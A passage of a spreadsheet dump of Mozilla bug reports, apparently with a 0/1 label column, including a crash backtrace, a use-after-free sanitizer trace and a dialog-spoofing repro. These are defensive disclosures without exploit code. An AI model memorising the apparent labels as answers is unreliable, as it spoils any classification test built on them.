#3  0x002297bb in js_TraceContext (trc=0xbfffa8d4, acx=0xda03ae0) at /Users/bzbarsky/mozilla/tracemonkey/mozilla/js/src/jsgc.cpp:2831
	a = (JSArena *) 0x14b3400
	age = 0
	fp = (JSStackFrame *) 0x14b377c
	nextChain = (JSStackFrame *) 0x0
	sh = (JSStackHeader *) 0x0
	tvr = (JSTempValueRooter *) 0x0
#4  0x00229d38 in js_TraceRuntime (trc=0xbfffa8d4, allAtoms=0) at /Users/bzbarsky/mozilla/tracemonkey/mozilla/js/src/jsgc.cpp:2916
	rt = (JSRuntime *) 0x1058200
	iter = (JSContext *) 0xda03ae0
	acx = (JSContext *) 0xda03ae0
#5  0x0022a91d in js_GC (cx=0xda03ae0, gckind=GC_NORMAL) at /Users/bzbarsky/mozilla/tracemonkey/mozilla/js/src/jsgc.cpp:3304
	rt = (JSRuntime *) 0x1058200
	trc = {
  context = 0xda03ae0, 
  callback = 0, 
  debugPrinter = 0, 
  debugPrintArg = 0x345164, 
  debugPrintIndex = 4294967295
}
	a = (JSGCArenaInfo *) 0x0
	flagp = (uint8 *) 0x318052 "[}\f\004t\006}\f\006u\006E\001\004E"
	freeList = (JSGCThing *) 0xda03b7c
	callback = (JSGCCallback) 0x4512f52 &lt;DOMGCCallback&gt;
	emptyArenas = (JSGCArenaInfo *) 0x0
	acx = (JSContext *) 0x0
	iter = (JSContext *) 0x0
	keepAtoms = 0
	type = 131651776
	thingSize = 2010107
	requestDebit = 1
	i = 3221203732
	indexLimit = 3221203732
	ap = (JSGCArenaInfo **) 0x2ef2000
	flags = 0 '\0'
	thing = (JSGCThing *) 0xda03b7c
	allClear = 46700
	arenaList = (JSGCArenaList *) 0x2ef214c
#6  0x001de86b in JS_GC (cx=0xda03ae0) at /Users/bzbarsky/mozilla/tracemonkey/mozilla/js/src/jsapi.cpp:2515
No locals.
#7  0x045116a2 in MaybeGC (cx=0xda03ae0) at /Users/bzbarsky/mozilla/tracemonkey/mozilla/dom/src/base/nsJSEnvironment.cpp:857
	bytes = 27115520
	lastBytes = 1687552
#8  0x04518570 in nsJSContext::DOMOperationCallback (cx=0xda03ae0) at /Users/bzbarsky/mozilla/tracemonkey/mozilla/dom/src/base/nsJSEnvironment.cpp:878
	win = {
  mRawPtr = 0xdeadbeef
}
	stopButton = {
  &lt;nsString&gt; = {
    &lt;nsAString_internal&gt; = {
      &lt;&gt; = {&lt;No data fields&gt;}, 
      members of nsAString_internal: 
      mData = 0x7, 
      mLength = 0, 
      mFlags = 0
    }, &lt;No data fields&gt;}, &lt;No data fields&gt;}
	waitButton = {
  &lt;nsString&gt; = {
    &lt;nsAString_internal&gt; = {
      &lt;&gt; = {&lt;No data fields&gt;}, 
      members of nsAString_internal: 
      mData = 0xbfffabc8, 
      mLength = 2555570, 
      mFlags = 153218256
    }, &lt;No data fields&gt;}, &lt;No data fields&gt;}
	neverShowDlg = {
  &lt;nsString&gt; = {
    &lt;nsAString_internal&gt; = {
      &lt;&gt; = {&lt;No data fields&gt;}, 
      members of nsAString_internal: 
      mData = 0x1066750, 
      mLength = 153251292, 
      mFlags = 0
    }, &lt;No data fields&gt;}, &lt;No data fields&gt;}
	buttonPressed = 0
	now = 658921650485460992
	isTrackingChromeCodeTime = 21706620
	bundle = {
  mRawPtr = 0xda85
}
	debugButton = {
  &lt;nsString&gt; = {
    &lt;nsAString_internal&gt; = {
      &lt;&gt; = {&lt;No data fields&gt;}, 
      members of nsAString_internal: 
      mData = 0x1f, 
      mLength = 212992, 
      mFlags = 2555207
    }, &lt;No data fields&gt;}, &lt;No data fields&gt;}
	buttonFlags = 1
	callbackTime = 1219341842903563
	docShell = (Cannot access memory at address 0xa</t>
        </is>
      </c>
      <c r="X5443" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5444">
      <c r="A5444" t="n">
        <v>723808</v>
      </c>
      <c r="B5444" t="inlineStr">
        <is>
          <t>2012-02-02 19:29:32 -0800</t>
        </is>
      </c>
      <c r="C5444" t="inlineStr">
        <is>
          <t>disallow inheriting of system principal in type=content docshells</t>
        </is>
      </c>
      <c r="D5444" t="inlineStr">
        <is>
          <t>2012-03-06 11:37:56 -0800</t>
        </is>
      </c>
      <c r="E5444" t="n">
        <v>1</v>
      </c>
      <c r="F5444" t="n">
        <v>1</v>
      </c>
      <c r="G5444" t="n">
        <v>3</v>
      </c>
      <c r="H5444" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5444" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5444" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K5444" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5444" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5444" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5444" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5444" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5444" t="inlineStr">
        <is>
          <t>[sg:want P1][qa-]</t>
        </is>
      </c>
      <c r="Q5444" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5444" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5444" t="inlineStr">
        <is>
          <t>mozilla13</t>
        </is>
      </c>
      <c r="T5444" t="n">
        <v>1</v>
      </c>
      <c r="U5444" t="n">
        <v>0</v>
      </c>
      <c r="V5444" t="n">
        <v>29</v>
      </c>
      <c r="W5444" t="inlineStr">
        <is>
          <t>We've had a number of bugs over the years that were the result of somehow managing to load principal-inheriting URIs (data: and javascript:) on chrome-privileged pages loaded in the browser content area (e.g. about:config). Now that we have more and more chrome-privileged "in-content" pages, that's even more likely to be possible. As a precautionary measure, it makes sense to disallow these loads from inheriting the system principal - it seems quite unlikely that there are any valid use cases for this.</t>
        </is>
      </c>
      <c r="X5444" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5445">
      <c r="A5445" t="n">
        <v>153815</v>
      </c>
      <c r="B5445" t="inlineStr">
        <is>
          <t>2002-06-23 23:04:49 -0700</t>
        </is>
      </c>
      <c r="C5445" t="inlineStr">
        <is>
          <t>crash in Trunk M1BR [@ nsImageListener::FrameChanged]  [@ nsImageFrame::FrameChanged] [@ nsImageBoxListener::OnStopDecode] [@ nsTableCellFrame::SetColIndex] [@ @0x00000000][@ nsImageWin::DrawToImage]  (remaining issues from bug 144315)</t>
        </is>
      </c>
      <c r="D5445" t="inlineStr">
        <is>
          <t>2014-04-26 03:32:18 -0700</t>
        </is>
      </c>
      <c r="E5445" t="n">
        <v>1</v>
      </c>
      <c r="F5445" t="n">
        <v>1</v>
      </c>
      <c r="G5445" t="n">
        <v>3</v>
      </c>
      <c r="H5445" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5445" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5445" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K5445" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5445" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5445" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5445" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5445" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5445" t="inlineStr">
        <is>
          <t>[adt2] custrtm- [ETA 09/09]</t>
        </is>
      </c>
      <c r="Q5445" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5445" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5445" t="inlineStr">
        <is>
          <t>mozilla1.2alpha</t>
        </is>
      </c>
      <c r="T5445" t="n">
        <v>1</v>
      </c>
      <c r="U5445" t="n">
        <v>2</v>
      </c>
      <c r="V5445" t="n">
        <v>199</v>
      </c>
      <c r="W5445" t="inlineStr">
        <is>
          <t>crash in nsImageListener::FrameChanged (remaining issues from bug 144315 - see
that bug for details)
search for a place in GB using http://streetmap.co.uk when yuo get the map,
click on the arrows to navigate. i managed to crash pretty fast when i open the
link in a new tab.</t>
        </is>
      </c>
      <c r="X5445" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5446">
      <c r="A5446" t="n">
        <v>1443169</v>
      </c>
      <c r="B5446" t="inlineStr">
        <is>
          <t>2018-03-05 07:45:19 -0800</t>
        </is>
      </c>
      <c r="C5446" t="inlineStr">
        <is>
          <t>update AuroraVersionFixitRule info for 60.0b1</t>
        </is>
      </c>
      <c r="D5446" t="inlineStr">
        <is>
          <t>2018-04-30 11:23:56 -0700</t>
        </is>
      </c>
      <c r="E5446" t="n">
        <v>1</v>
      </c>
      <c r="F5446" t="n">
        <v>1</v>
      </c>
      <c r="G5446" t="n">
        <v>4</v>
      </c>
      <c r="H5446" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5446" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5446" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5446" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5446" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5446" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5446" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5446" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5446" t="inlineStr"/>
      <c r="Q5446" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5446" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5446" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5446" t="n">
        <v>1</v>
      </c>
      <c r="U5446" t="n">
        <v>0</v>
      </c>
      <c r="V5446" t="n">
        <v>6</v>
      </c>
      <c r="W5446" t="inlineStr">
        <is>
          <t>There's a processor rule called AuroraVersionFixitRule in socorro/processor/mozilla_transform_rules.py that has a hard-coded lookup table of build id -&gt; correct version number. Since it's hard-coded, we need to update it every time a new Aurora version is released.
According to buildhub, it's been released:
https://mozilla-services.github.io/buildhub/?q=60.0b1
The build id is 20180302190033, so we need to add this:
    '20180302190033': '60.0b1'
to the lookup table.
This bug covers adding that.
After fixing this and pushing it to -prod, we need to reprocess all the crashes with that build id so they pick up the right version number.
https://crash-stats.mozilla.com/search/?product=Firefox&amp;version=60.0b0&amp;date=%3E%3D2018-02-19T10%3A44%3A29.000Z&amp;date=%3C2018-03-10T10%3A44%3A00.000Z&amp;_sort=-date&amp;_facets=signature&amp;_columns=date&amp;_columns=signature&amp;_columns=product&amp;_columns=version&amp;_columns=build_id&amp;_columns=platform#facet-signature
(Make sure to adjust dates as necessary.)</t>
        </is>
      </c>
      <c r="X5446" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5447">
      <c r="A5447" t="n">
        <v>1328121</v>
      </c>
      <c r="B5447" t="inlineStr">
        <is>
          <t>2017-01-02 00:31:54 -0800</t>
        </is>
      </c>
      <c r="C5447" t="inlineStr">
        <is>
          <t>nightly crash when using ebay/paypal  [@ nsDocumentOpenInfo::OnStartRequest ]</t>
        </is>
      </c>
      <c r="D5447" t="inlineStr">
        <is>
          <t>2017-10-26 19:05:47 -0700</t>
        </is>
      </c>
      <c r="E5447" t="n">
        <v>1</v>
      </c>
      <c r="F5447" t="n">
        <v>1</v>
      </c>
      <c r="G5447" t="n">
        <v>3</v>
      </c>
      <c r="H5447" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5447" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5447" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5447" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5447" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5447" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5447" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5447" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5447" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main52+]</t>
        </is>
      </c>
      <c r="Q5447" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5447" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5447" t="inlineStr">
        <is>
          <t>mozilla53</t>
        </is>
      </c>
      <c r="T5447" t="n">
        <v>1</v>
      </c>
      <c r="U5447" t="n">
        <v>0</v>
      </c>
      <c r="V5447" t="n">
        <v>26</v>
      </c>
      <c r="W5447" t="inlineStr">
        <is>
          <t>Crash id: https://crash-stats.mozilla.com/report/index/d2771913-daf5-4266-8e79-f62142170102
What I did:
Buy a thing using ebay.com.au
Select PayPal payment method
Enter your Paypal details
It spins for a few seconds, then crashes.
Crash was 100% reproducible and I've made ~6 identical crash reports. I have made the payment since, so now I can no longer try (such as without addons), sorry.</t>
        </is>
      </c>
      <c r="X5447" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5448">
      <c r="A5448" t="n">
        <v>1846205</v>
      </c>
      <c r="B5448" t="inlineStr">
        <is>
          <t>2023-07-30 21:07:39 -0700</t>
        </is>
      </c>
      <c r="C5448" t="inlineStr">
        <is>
          <t>File picker should cause the browser window to lose focus on Mac</t>
        </is>
      </c>
      <c r="D5448" t="inlineStr">
        <is>
          <t>2024-04-28 23:34:33 -0700</t>
        </is>
      </c>
      <c r="E5448" t="n">
        <v>1</v>
      </c>
      <c r="F5448" t="n">
        <v>1</v>
      </c>
      <c r="G5448" t="n">
        <v>3</v>
      </c>
      <c r="H5448" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5448" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5448" t="inlineStr">
        <is>
          <t>Widget: Cocoa</t>
        </is>
      </c>
      <c r="K5448" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5448" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5448" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5448" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5448" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5448" t="inlineStr">
        <is>
          <t>[adv-main119+][adv-ESR115.4+]</t>
        </is>
      </c>
      <c r="Q5448" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R5448" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5448" t="inlineStr">
        <is>
          <t>120 Branch</t>
        </is>
      </c>
      <c r="T5448" t="n">
        <v>1</v>
      </c>
      <c r="U5448" t="n">
        <v>0</v>
      </c>
      <c r="V5448" t="n">
        <v>16</v>
      </c>
      <c r="W5448" t="inlineStr">
        <is>
          <t>+++ This bug was initially created as a follow-up of Bug #1821884 comment# 40 +++
It appear that opening a file picker doesn't cause the browser window to lose focus on Mac (web content doesn't receive the `blur` event), so the solution in bug 1821884 doesn't work on Mac. I tested Chrome and Safari on Mac, both of them move the focus out of browser window when the file picker is opened, we probably should do the same.</t>
        </is>
      </c>
      <c r="X5448" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5449">
      <c r="A5449" t="n">
        <v>1527348</v>
      </c>
      <c r="B5449" t="inlineStr">
        <is>
          <t>2019-02-12 08:13:01 -0800</t>
        </is>
      </c>
      <c r="C5449" t="inlineStr">
        <is>
          <t>add metrics for de-nulling in antenna</t>
        </is>
      </c>
      <c r="D5449" t="inlineStr">
        <is>
          <t>2019-02-12 13:40:21 -0800</t>
        </is>
      </c>
      <c r="E5449" t="n">
        <v>1</v>
      </c>
      <c r="F5449" t="n">
        <v>1</v>
      </c>
      <c r="G5449" t="n">
        <v>4</v>
      </c>
      <c r="H5449" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I5449" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J5449" t="inlineStr">
        <is>
          <t>Antenna</t>
        </is>
      </c>
      <c r="K5449" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5449" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5449" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5449" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5449" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5449" t="inlineStr"/>
      <c r="Q5449" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5449" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5449" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5449" t="n">
        <v>1</v>
      </c>
      <c r="U5449" t="n">
        <v>0</v>
      </c>
      <c r="V5449" t="n">
        <v>6</v>
      </c>
      <c r="W5449" t="inlineStr">
        <is>
          <t>Bug #1357246 covers moving the de-nulling code from Antenna to the processor. Part of that work has been completed: the processor now has a de-nulling rule. Implementing the Antenna side of that bug is interesting in that we can't test it on stage at all because stage gets crash reports that have already been de-nulled.
How many keys and values is Antenna de-nulling in prod? Does it come up a lot? Is it rare?
This bug covers adding metrics to Antenna to tell us how often it removes nulls from the keys/values of the raw crash.</t>
        </is>
      </c>
      <c r="X5449" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5450">
      <c r="A5450" t="n">
        <v>1808632</v>
      </c>
      <c r="B5450" t="inlineStr">
        <is>
          <t>2023-01-04 14:23:57 -0800</t>
        </is>
      </c>
      <c r="C5450" t="inlineStr">
        <is>
          <t>Potential null pointer dereference in TaskbarPreviewCallback::Done() caused by failure to check return value</t>
        </is>
      </c>
      <c r="D5450" t="inlineStr">
        <is>
          <t>2024-06-02 11:56:33 -0700</t>
        </is>
      </c>
      <c r="E5450" t="n">
        <v>1</v>
      </c>
      <c r="F5450" t="n">
        <v>1</v>
      </c>
      <c r="G5450" t="n">
        <v>3</v>
      </c>
      <c r="H5450" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5450" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5450" t="inlineStr">
        <is>
          <t>Widget: Win32</t>
        </is>
      </c>
      <c r="K5450" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5450" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5450" t="inlineStr">
        <is>
          <t>Windows</t>
        </is>
      </c>
      <c r="N5450" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5450" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5450" t="inlineStr">
        <is>
          <t>[win:stability][adv-main110+]</t>
        </is>
      </c>
      <c r="Q5450" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5450" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S5450" t="inlineStr">
        <is>
          <t>110 Branch</t>
        </is>
      </c>
      <c r="T5450" t="n">
        <v>1</v>
      </c>
      <c r="U5450" t="n">
        <v>0</v>
      </c>
      <c r="V5450" t="n">
        <v>9</v>
      </c>
      <c r="W5450" t="inlineStr">
        <is>
          <t>`TaskbarPreviewCallback::Done()` (`widget/windows/TaskbarPreview.cpp`) doesn't check the return value from `gfx::SourceSurfaceSkia::Map()`. I think this call cannot actually fail, but if it did, later lines would dereference a null pointer. The bug wouldn't cause use of an uninitialized pointer because the pointer in question is contained in a `gfx::DataSourceSurface::MappedSurface`, which uses default member initializers (yay C++11!). The bug is on line 359 (trunk):
```
321: NS_IMETHODIMP
322: TaskbarPreviewCallback::Done(nsISupports* aCanvas, bool aDrawBorder) {
...
358:   gfx::DataSourceSurface::MappedSurface sourceMap;
359:   srcSurface-&gt;Map(gfx::DataSourceSurface::READ, &amp;sourceMap);
360:   mozilla::gfx::CopySurfaceDataToPackedArray(
361:       sourceMap.mData, imageSurface-&gt;Data(), srcSurface-&gt;GetSize(),
362:       sourceMap.mStride, BytesPerPixel(srcSurface-&gt;GetFormat()));
363:   srcSurface-&gt;Unmap();
```
I have filed this as a security bug in case I missed something that would cause use of an uninitialized pointer in some circumstance.</t>
        </is>
      </c>
      <c r="X5450" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5451">
      <c r="A5451" t="n">
        <v>277574</v>
      </c>
      <c r="B5451" t="inlineStr">
        <is>
          <t>2005-01-08 12:55:16 -0800</t>
        </is>
      </c>
      <c r="C5451" t="inlineStr">
        <is>
          <t>Http auth prompt from other tabs displays over current tab</t>
        </is>
      </c>
      <c r="D5451" t="inlineStr">
        <is>
          <t>2007-08-13 20:12:45 -0700</t>
        </is>
      </c>
      <c r="E5451" t="n">
        <v>1</v>
      </c>
      <c r="F5451" t="n">
        <v>1</v>
      </c>
      <c r="G5451" t="n">
        <v>2</v>
      </c>
      <c r="H5451" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5451" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5451" t="inlineStr">
        <is>
          <t>Tabbed Browser</t>
        </is>
      </c>
      <c r="K5451" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5451" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5451" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5451" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5451" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5451" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q5451" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5451" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5451" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5451" t="n">
        <v>1</v>
      </c>
      <c r="U5451" t="n">
        <v>0</v>
      </c>
      <c r="V5451" t="n">
        <v>34</v>
      </c>
      <c r="W5451" t="inlineStr">
        <is>
          <t>This is related to bug 262887. The fix for that bug makes download dialogs and
Javascript prompt/alert/confirm dialogs focus the tab that spawned them.
I think this behaviour should apply to HTTP authentication dialogs as well.
Steps to reproduce:
1. Open testcase
2. Open the website of your bank in another tab
3. Wait 5 seconds
Expected result:
The tab containing the testcase should be focused before an HTTP authentication
dialog is opened.
Actual result:
An HTTP authentication dialog is opened while the tab showing the bank website
has focus. This gives the impressions that the bank website spawned the dialog.</t>
        </is>
      </c>
      <c r="X5451" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5452">
      <c r="A5452" t="n">
        <v>1591467</v>
      </c>
      <c r="B5452" t="inlineStr">
        <is>
          <t>2019-10-25 08:44:17 -0700</t>
        </is>
      </c>
      <c r="C5452" t="inlineStr">
        <is>
          <t>Crash in [@ mozilla::dom::BrowserParent::GetContentPrincipal]</t>
        </is>
      </c>
      <c r="D5452" t="inlineStr">
        <is>
          <t>2019-12-13 07:38:11 -0800</t>
        </is>
      </c>
      <c r="E5452" t="n">
        <v>1</v>
      </c>
      <c r="F5452" t="n">
        <v>1</v>
      </c>
      <c r="G5452" t="n">
        <v>3</v>
      </c>
      <c r="H5452" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5452" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5452" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K5452" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5452" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5452" t="inlineStr">
        <is>
          <t>Windows 10</t>
        </is>
      </c>
      <c r="N5452" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5452" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5452" t="inlineStr">
        <is>
          <t>[domsecurity-active]</t>
        </is>
      </c>
      <c r="Q5452" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5452" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5452" t="inlineStr">
        <is>
          <t>mozilla72</t>
        </is>
      </c>
      <c r="T5452" t="n">
        <v>1</v>
      </c>
      <c r="U5452" t="n">
        <v>0</v>
      </c>
      <c r="V5452" t="n">
        <v>12</v>
      </c>
      <c r="W5452" t="inlineStr">
        <is>
          <t>This bug is for crash report bp-b737eed7-af8c-45ae-b95d-8678c0191025.
Seen while looking at nightly crash stats - small volume Windows crash which started in 20191024214023: https://bit.ly/368b1q8
Possible regression range based on build ID: https://hg.mozilla.org/mozilla-central/pushloghtml?fromchange=ad7a152bc66c0d411a6fb0b210d675abed9693c7&amp;tochange=dd7a79a0e83d6d24f672ce3f619f613ca7ab5f1d
Stack references Bug 1590032. ni in case that is related
```
Top 10 frames of crashing thread:
0 xul.dll mozilla::dom::BrowserParent::GetContentPrincipal dom/ipc/BrowserParent.cpp:496
1 xul.dll bool nsFrameLoader::TryRemoteBrowserInternal dom/base/nsFrameLoader.cpp:2531
2 xul.dll nsFrameLoader::TryRemoteBrowser dom/base/nsFrameLoader.cpp:2705
3 xul.dll nsFrameLoader::ShowRemoteFrame dom/base/nsFrameLoader.cpp:1007
4 xul.dll nsFrameLoader::Show dom/base/nsFrameLoader.cpp:874
5 xul.dll nsSubDocumentFrame::ShowViewer layout/generic/nsSubDocumentFrame.cpp:196
6 xul.dll nsresult AsyncFrameInit::Run layout/generic/nsSubDocumentFrame.cpp:94
7 xul.dll nsContentUtils::RemoveScriptBlocker dom/base/nsContentUtils.cpp:5190
8 xul.dll mozilla::dom::Document::EndUpdate dom/base/Document.cpp:7031
9 xul.dll nsINode::ReplaceOrInsertBefore dom/base/nsINode.cpp:2407
```</t>
        </is>
      </c>
      <c r="X5452" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5453">
      <c r="A5453" t="n">
        <v>963150</v>
      </c>
      <c r="B5453" t="inlineStr">
        <is>
          <t>2014-01-23 08:48:06 -0800</t>
        </is>
      </c>
      <c r="C5453" t="inlineStr">
        <is>
          <t>heap-use-after-free in libnss3.so!CERT_DestroyCertificate</t>
        </is>
      </c>
      <c r="D5453" t="inlineStr">
        <is>
          <t>2024-05-30 08:32:20 -0700</t>
        </is>
      </c>
      <c r="E5453" t="n">
        <v>1</v>
      </c>
      <c r="F5453" t="n">
        <v>1</v>
      </c>
      <c r="G5453" t="n">
        <v>3</v>
      </c>
      <c r="H5453" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5453" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J5453" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K5453" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L5453" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5453" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N5453" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5453" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5453" t="inlineStr">
        <is>
          <t>[qa-][adv-main31+][adv-esr24.7+][reporter-external]</t>
        </is>
      </c>
      <c r="Q5453" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5453" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5453" t="inlineStr">
        <is>
          <t>3.16.2</t>
        </is>
      </c>
      <c r="T5453" t="n">
        <v>1</v>
      </c>
      <c r="U5453" t="n">
        <v>0</v>
      </c>
      <c r="V5453" t="n">
        <v>56</v>
      </c>
      <c r="W5453" t="inlineStr">
        <is>
          <t>Found by the BlackBerry Security Automated Analysis Team's fuzzing framework ALF.
At this time we are unable to create a test case that will reproduce the issue. However we do see it during our analysis a couple times a day so once a build with a fix is available we should be able to verify that this issue has been resolved. 
==5650==ERROR: AddressSanitizer: heap-use-after-free on address 0x61d0013a9f38 at pc 0x7f2091221f48 bp 0x7f207adcd0d0 sp 0x7f207adcd0c8
READ of size 8 at 0x61d0013a9f38 thread T3 (Socket Thread)
    #0 0x7f2091221f47 (libnss3.so!CERT_DestroyCertificate+0x57)
	Line 791 of "stanpcertdb.c"
    #1 0x7f208fb41b08 (libssl3.so!ssl3_DestroySSL3Info+0xd8)
	Line 9635 of "ssl3con.c"
    #2 0x7f208fb777ce (libssl3.so!ssl_DestroySocketContents+0x1e)
	Line 335 of "sslsock.c"
    #3 0x7f208fb77527 (libssl3.so!ssl_FreeSocket+0x187)
	Line 398 of "sslsock.c"
